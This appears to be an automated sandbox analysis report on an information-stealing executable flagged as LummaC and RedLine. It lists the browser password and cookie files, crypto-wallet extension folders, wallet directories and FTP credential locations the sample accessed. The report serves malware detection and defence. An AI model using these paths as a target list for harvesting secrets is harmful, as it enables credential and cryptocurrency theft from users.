                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected LummaC Stealer
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 8060, type: MEMORYSTR
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: dlcdkJcbbV.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.dlcdkJcbbV.exe.8d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000000.2304090109.00000000008D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: dlcdkJcbbV.exe PID: 6864, type: MEMORYSTR
                    Found many strings related to Crypto-Wallets (likely being stolen)
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ElectrumE#
                    Source: BitLockerToGo.exe, 00000009.00000003.2764259056.0000000003494000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\ElectronCash\wallets
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: com.liberty.jaxx
                    Source: BitLockerToGo.exe, 00000009.00000003.2764259056.0000000003494000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                    Source: BitLockerToGo.exe, 00000009.00000003.2764259056.0000000003494000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ExodusE#
                    Source: dlcdkJcbbV.exe, 00000000.00000002.2578911958.0000000002E24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: EthereumE#
                    Source: BitLockerToGo.exe, 00000009.00000003.2760836658.0000000003483000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                    Source: BitLockerToGo.exe, 00000009.00000003.2764330363.000000000346E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\logins.jsonJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\places.sqliteJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\key4.dbJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\cert9.dbJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\formhistory.sqliteJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\prefs.jsJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\cookies.sqliteJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                    Tries to steal Crypto Currency Wallets
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\Jump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\Jump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                    Source: C:\Users\user\Desktop\dlcdkJcbbV.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
